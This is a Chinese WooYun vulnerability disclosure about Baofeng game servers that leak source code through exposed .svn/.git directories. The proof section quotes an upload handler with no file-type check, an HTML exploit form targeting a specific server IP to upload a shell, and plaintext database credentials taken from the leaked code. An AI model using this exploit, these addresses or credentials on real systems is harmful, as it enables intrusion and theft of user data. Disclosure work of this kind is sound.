当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171222

漏洞标题:暴风游戏多处存在信息泄露可getshell导致泄漏用户数据

相关厂商:暴风影音

漏洞作者: 兔小白

提交时间:2016-01-20 00:28

修复时间:2016-01-25 00:30

公开时间:2016-01-25 00:30

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

暴风游戏多处存在信息泄露可getshell,导致泄漏用户数据

详细说明:

一、起因
发现暴风游戏一处svn泄漏,但是发现乌云上有人提交了。这里我又对服务器进行了一些分析。
二、经过
发现该服务器另外一处svn泄漏。同时存在任意文件上传,导致被获取shell。
该服务器上有多个网站。这个之前HackBraid提交的漏洞已经提到了。我就不截图了。
我把获取shell的过程记录一下。
存在泄漏的地址为

http://120.26.14.66/.svn/entries


通过该处下载代码,通过查看代码,发现上传漏洞获取shell。漏洞代码和利用代码发到漏洞证明那处了。
这里遇到一个问题,就是访问的时候,经常会出现访问不了的问题,但是这里真实存在的。应该是因为阿里云服务器的关系吧

baofeng4.png


3、其他
另外该服务器上还有这类问题。例如:

http://sdk.g.baofeng.com/.git/config


可以使用lijiejie大牛的GitHack下载一些数据库的配置文件
其他站点的信息泄漏部分管理自己查找并清理下。我这里不一一列举了。
其他还有诸如phpinfo这类的页面。

http://weixinkaifa.7433.com/test.php
http://datacenter.ak.cc/php.php


此处不一一列举了。

漏洞证明:

过程不再复述。这里重点我贴一下代码
通过查看泄漏的代码,发现uploadify/uploadify.back.php文件中上传未作任何类型检查,可以上传任意文件。代码如下:

if( $file_type ==1 )
{
	$targetFolder = '/tmpfile'; // Relative to the root
	
	if (!empty($_FILES)) {
		$tempFile = $_FILES['Filedata']['tmp_name'];
		$imgfile_name = $_FILES['Filedata']['name'];
		$targetPath = $_SERVER['DOCUMENT_ROOT'] . $targetFolder;
		$NewFileName = date("ymdHis", time()).mt_rand(100,999);
		$targetFile = rtrim($targetPath,'/') . '/' . $NewFileName;
		$fs = explode('.', $imgfile_name);
		$targetFile = $targetFile.'.'.$fs[count($fs)-1];
		// Validate the file type
		$fileTypes = array('jpg','jpeg','gif','png','rar'); // File extensions
		$fileParts = pathinfo($_FILES['Filedata']['name']);
	
		move_uploaded_file($tempFile,$targetFile);
		$res = date('Y').'/'.date('m').'/'.$NewFileName.'.'.$fs[count($fs)-1];
		echo $res;
		exit;
	}
	else
	{
		echo "Anger";
	}
	exit;
}


构造利用代码如下:

<html>
<body>
<form action="http://120.26.14.66/uploadify/uploadify.back.php" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata" id="file" /> 
<input type="hidden" name="file_type" id="file_type" value="1" /> 
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>


数据库连接信息

// ----------------------------  CONFIG DB  ----------------------------- //
$_config['db']['1']['dbhost'] = '10.252.215.80';
$_config['db']['1']['dbuser'] = 'CXsdk';
$_config['db']['1']['dbpw'] = 'CXsdk123456';
$_config['db']['1']['dbcharset'] = 'utf8';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'bf_bbsm';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['slave'] = '';
$_config['db']['common']['slave_except_table'] = '';


大概浏览了一下,几个站的库都在上面,有一些会员数据。

baofeng4.png


接下来不做深入挖掘。抓紧修补漏洞吧。

修复方案:

1、删除svn的版本管理文件。
2、对上传的代码做好严格控制
3、删除掉一些phpinfo()页面。

版权声明:转载请注明来源 兔小白@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-25 00:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无